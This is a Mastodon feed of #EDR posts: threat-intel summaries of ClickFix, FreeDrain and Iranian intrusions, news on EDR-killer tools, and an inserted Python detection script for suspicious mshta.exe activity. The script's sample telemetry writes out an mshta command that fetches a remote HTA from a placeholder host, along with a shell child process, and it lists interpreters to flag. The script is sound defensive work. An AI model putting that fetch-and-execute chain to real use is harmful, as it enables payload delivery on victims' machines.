#EDR

2025-05-23

Caught in the CAPTCHA: How ClickFix is Weaponizing Verification Fatigue to Deliver RATs & Infostealers

Threat actors are exploiting user fatigue with anti-spam mechanisms through a technique called ClickFix. This method involves compromising websites and embedding fraudulent CAPTCHA images, which, when solved by unsuspecting users, lead to the execution of malicious code. The attack chain typically includes PowerShell commands and the use of legitimate Windows tools to download and execute additional payloads. Common malware delivered through this technique includes Lumma Stealer, NetSupport RAT, and SectopRAT. The success of ClickFix relies heavily on social engineering and user interaction, making user education and awareness crucial in mitigating these attacks. Recommendations include training users to recognize suspicious requests, restricting PowerShell execution, and deploying advanced EDR solutions.

Pulse ID: 682f9d00cee548c073778038
Pulse Link: otx.alienvault.com/pulse/682f9
Pulse Author: AlienVault
Created: 2025-05-22 21:54:08

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CAPTCHA #CyberSecurity #EDR #Education #InfoSec #InfoStealer #LummaStealer #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #RAT #SMS #SocialEngineering #Spam #Windows #bot #AlienVault

2025-05-14

2025 Ransomware Trends You Need to Know

Ransomware isn’t slowing down—in fact, it’s evolving faster than ever in 2025. Watch our new video for details on ransomware trends, including:

🔹 AI-powered ransomware that evolves faster than defenders can keep up
🔹 A surge in rookie attackers using leaked playbooks and dark web kits
🔹 The 2025 must-have proactive prevention strategies

Watch now for the details! youtu.be/r4_ePm3swE0

#Cybersecurity #Cyberaware #Ransomware #RansomwareTrends #AIThreats #EDR #XDR #SupplyChainSecurity

ByteSectorX (bytesectorx)
2025-05-12

Hunting hidden threats in your network? 🕵️ Learn to master EDR threat hunting by building custom detection rules! Our new article dives deep into leveraging EDR for proactive cybersecurity. Level up your defenses! 🚀

bytesectorx.blogspot.com/2025/

Benjamin Carr, Ph.D. 👨🏻‍💻🧬 (BenjaminHCCarr@hachyderm.io)
2025-05-10

#Ransomware crews add '#EDR killers' to their arsenal – and some aren't even malware
Criminals are disabling #security tools early in attacks, Talos says
Ransomware crews are increasingly using programs like #EDRSilencer, #EDRSandblast, #EDRKillShifter, and Terminator to either modify or completely disable endpoint detection and response (EDR) products.
theregister.com/2025/03/31/ran

2025-05-09

Unmasking the FreeDrain Network

A collaborative investigation by Validin and SentinelLABS exposes the FreeDrain Network, a large-scale cryptocurrency phishing operation. The campaign exploits search engine optimization, free web services, and redirection techniques to target and drain cryptocurrency wallets. The attackers use lure pages hosted on trusted platforms, which redirect victims to phishing sites mimicking legitimate wallet interfaces. The operation is believed to be run by individuals in the IST timezone, working standard business hours. The campaign has been active since at least 2022, with a notable acceleration in mid-2024. The research highlights the need for stronger safeguards on free publishing platforms to prevent such large-scale abuse.

Pulse ID: 681d25f00b6ceeb219d19c9a
Pulse Link: otx.alienvault.com/pulse/681d2
Pulse Author: AlienVault
Created: 2025-05-08 21:45:20

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EDR #InfoSec #Mimic #OTX #OpenThreatExchange #Phishing #RAT #Rust #SentinelLabs #bot #cryptocurrency #AlienVault

2025-05-09

FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network

FreeDrain is a sophisticated, large-scale cryptocurrency phishing operation that has been stealing digital assets for years. It exploits search engine optimization, free-tier web services, and layered redirection techniques to target cryptocurrency wallets. Victims are lured through high-ranking search results to phishing pages that mimic legitimate wallet interfaces. The operation has been linked to over 38,000 distinct subdomains hosting lure pages. Evidence suggests the operators are based in the UTC+05:30 timezone, likely in India, working standard weekday hours. The campaign highlights systemic weaknesses in free publishing platforms and the need for stronger safeguards, user education, and security community collaboration to combat such threats.

Pulse ID: 681e194bee59e1953f5a22e8
Pulse Link: otx.alienvault.com/pulse/681e1
Pulse Author: AlienVault
Created: 2025-05-09 15:03:39

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EDR #Education #India #InfoSec #Mimic #OTX #OpenThreatExchange #Phishing #RAT #bot #cryptocurrency #AlienVault

Christopher Budd (cbudd@infosec.exchange)
2025-05-08

This is actually a pretty smart and simple trick, abusing the update process.

This is another one where now that someone has thought of it, I'm surprised no one thought of this angle sooner.

cybersecuritynews.com/threat-a

#security #attacks #EDR #ransomware

2025-05-06

Investigating Iranian Intrusion into Strategic Middle East Critical Infrastructure

This report details a prolonged Iranian state-sponsored intrusion into critical national infrastructure in the Middle East from May 2023 to February 2025. The threat actors employed various tactics including web shells, custom malware, and legitimate tools to maintain persistent access across multiple network segments. Key findings include the use of novel malware families like HanifNet and NeoExpressRAT, as well as extensive credential harvesting and lateral movement techniques. The intrusion demonstrated sophisticated evasion capabilities and targeted attempts to access operational technology networks. Forensic analysis revealed potential links to previously reported Iranian APT campaigns. The report provides detailed technical indicators and recommends enhanced logging, EDR deployment, and multi-factor authentication to defend against similar threats.

Pulse ID: 681a66fd8309a0fad22d97ae
Pulse Link: otx.alienvault.com/pulse/681a6
Pulse Author: AlienVault
Created: 2025-05-06 19:46:05

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #EDR #ICS #InfoSec #Iran #Malware #MiddleEast #OTX #OpenThreatExchange #OperationalTechnology #RAT #bot #AlienVault

2025-04-30

EDR for Windows: basics, architecture and operating principles

In the previous articles (1, 2, 3) of this series on event collection in Windows and Linux, we looked at which types of event sources matter for monitoring from an information security standpoint, and at how the corresponding events are collected and sent to monitoring systems, including collection by means of agents.

habr.com/ru/companies/security

#информационная_безопасность #аудит_событий #edr #антивирусы

2025-04-28

Emerging Phishing Techniques: New Threats and Attack Vectors

This analysis delves into four sophisticated phishing techniques observed in 2025. These include embedding Base64-encoded JavaScript in SVG files, hiding malicious URLs in PDF annotations, using OneDrive links to deliver dynamic phishing content, and nesting MHT files within OpenXML documents. These methods successfully evaded email protections and reached intended victims, demonstrating the increasing sophistication of threat actors. The techniques exploit unconventional file formats, cloud-based platforms, and structural obfuscation to bypass traditional security measures. The findings emphasize the need for improved detection mechanisms, deeper inspection of file structures, and advanced context-aware parsing in email and document security tools.

Pulse ID: 680fac676d706a8fdbc062ab
Pulse Link: otx.alienvault.com/pulse/680fa
Pulse Author: AlienVault
Created: 2025-04-28 16:27:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CyberSecurity #EDR #Email #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PDF #Phishing #RAT #SMS #SVG #bot #AlienVault

Geekland (geekland)
2025-04-28
2025-04-23

This is a really nice write up from Sekoia with lots of #ThreatDetection details, regardless of the #EDR you're using.

🔎 Of particular note, this attack is aided with a .LNK file pulling in a .HTA via a remote location.

🕵🏼‍♂️ Detect .LNK files making external connections, they are particularly easy to tune.

🕵🏼‍♂️ Detect mshta.exe running suspicious executables (i.e. cmd.exe).

Happy #ThreatHunting

🔗 blog.sekoia.io/detecting-multi
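The two detections the post recommends, written out as an added example (my code, not Sekoia's or the poster's): flag mshta.exe when it is handed a remote URL or makes an external connection (the behaviour the .LNK triggers), and flag mshta.exe spawning a command shell or script interpreter. The events are constructed to resemble Sysmon EventID 1 (process create) and EventID 3 (network connect) records; the field names, the internal address ranges and the list of interpreters are assumptions you would adapt to your own telemetry.

```python
"""Detection logic for the two behaviours named in the post: mshta.exe
pulling remote content (the external connection an .LNK kicks off) and
mshta.exe spawning a command shell. Events are constructed to resemble
Sysmon EventID 1 (process create) and EventID 3 (network connect)."""
import ipaddress
import ntpath
import re
from dataclasses import dataclass

# Assumption: the organisation treats these ranges as internal. An explicit
# list is used instead of ipaddress.is_private so that documentation
# addresses (203.0.113.0/24) in the sample data count as external.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Assumption: interpreters whose launch from mshta.exe is unexpected.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    detail: str


def _basename(image: str) -> str:
    # ntpath handles Windows paths correctly even when run on Linux
    return ntpath.basename(image).lower()


def is_external(ip: str) -> bool:
    """True when the destination lies outside the internal ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_RANGES)


def detect(events):
    """Run the three rules over a list of event dicts and return the alerts."""
    alerts = []
    for ev in events:
        image = _basename(ev.get("Image", ""))
        if ev.get("EventID") == 1:
            parent = _basename(ev.get("ParentImage", ""))
            cmdline = ev.get("CommandLine", "")
            # Rule 1: mshta.exe given a remote URL (the .LNK -> remote .HTA pattern)
            if image == "mshta.exe" and REMOTE_URL.search(cmdline):
                alerts.append(Alert("mshta_remote_content", cmdline))
            # Rule 2: mshta.exe spawning a shell or script interpreter
            if parent == "mshta.exe" and image in SHELLS:
                alerts.append(Alert("mshta_child_shell", f"{parent} -> {cmdline}"))
        elif ev.get("EventID") == 3:
            # Rule 3: mshta.exe itself connecting to an external address
            dst = ev.get("DestinationIp", "")
            if image == "mshta.exe" and dst and is_external(dst):
                port = ev.get("DestinationPort")
                alerts.append(Alert("mshta_external_connection", f"{dst}:{port}"))
    return alerts


# Constructed sample telemetry (not real logs): a benign browser connection,
# a benign cmd.exe launched from explorer, and the mshta chain the post describes.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://example.invalid/update.hta"},
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

Rule 1 and Rule 3 are deliberately separate: the command-line check fires even if the download is blocked, while the network-connection check catches an HTA fetched through an indirection that keeps the URL out of the command line. Tuning usually means allow-listing the handful of internal HTA paths a site legitimately uses rather than loosening the rules.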

2025-04-04

It is dizzying to see the level of organisation of these #RaaS operations (#ransomware as a service). Thanks to the people at @ESETresearch for sharing their report on #ransomHub and the #EDR killers: welivesecurity.com/es/investig

Opalsec :verified: (Opalsec@infosec.exchange)
2025-04-03

Staying ahead means staying informed, right? Here's our latest wrap of the day's Cyber News:

🗞️ opalsec.io/daily-news-update-t

If you're short on time, here’s a quick whip-around of the top 3 stories of note:

🕵️‍♂️ Hunters Ransomware Rethink: Is the heat getting too much? Hunters International leadership reportedly told affiliates ransomware is now too "risky," planning a shift to pure data theft/extortion under a "World Leaks" banner. While their current status is murky, this potential pivot away from encryption echoes moves by other groups and highlights how defensive pressures are forcing attacker evolution – something we all need to track.

📧 White House OpSec Woes: Remember that recent White House Signal mishap? Well, now the same National Security Adviser is reportedly facing heat for using personal Gmail for sensitive (if unclassified) government discussions, raising serious OpSec and compliance alarms. It's a potent reminder for us all: even seemingly benign comms on personal platforms can create significant risks, and basic security hygiene is non-negotiable, especially when sensitive info is involved.

📞 Verizon API Call Log Leak: Here’s a worrying find: a simple API flaw in Verizon's Call Filter app exposed the incoming call history of potentially all their wireless customers to each other. Technically, it was a textbook case of broken object-level authorization – the API didn't check if the user's token matched the phone number whose logs were requested in a header. This highlights the critical need for robust API authorization checks and the significant privacy impact even call metadata can have.

Have a read of the full newsletter, and sign up to get all the details straight to your inbox each day:

📨 opalsec.io/daily-news-update-t

#CyberSecurity #InfoSec #ThreatIntel #Ransomware #DataBreach #DataLeak #Vulnerability #APIsecurity #CloudSecurity #SupplyChainSecurity #Malware #Privacy #CyberAttack #InfoSecNews #ThreatHunting #CISCO #Verizon #GitHub #NationalSecurity #AndroidSecurity #EDR #CyberAwareness

2025-04-02

IT security monitoring: 26 useful measures for detecting critical IT events

I have put together a comprehensive, practice-oriented overview for orientation, with concrete thresholds, conditions and tool categories:
➡️ User anomalies
➡️ System changes
➡️ Network anomalies
➡️ Ransomware indicators
➡️ Canary files, LSASS access, PowerShell analysis
➡️ Backup and GPO protection, and much more

kommunaler-notbetrieb.de/empfe

#ITSicherheit #Kommunen #Monitoring #Detektion #EDR #SIEM

Geekland (geekland)
2025-03-31

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst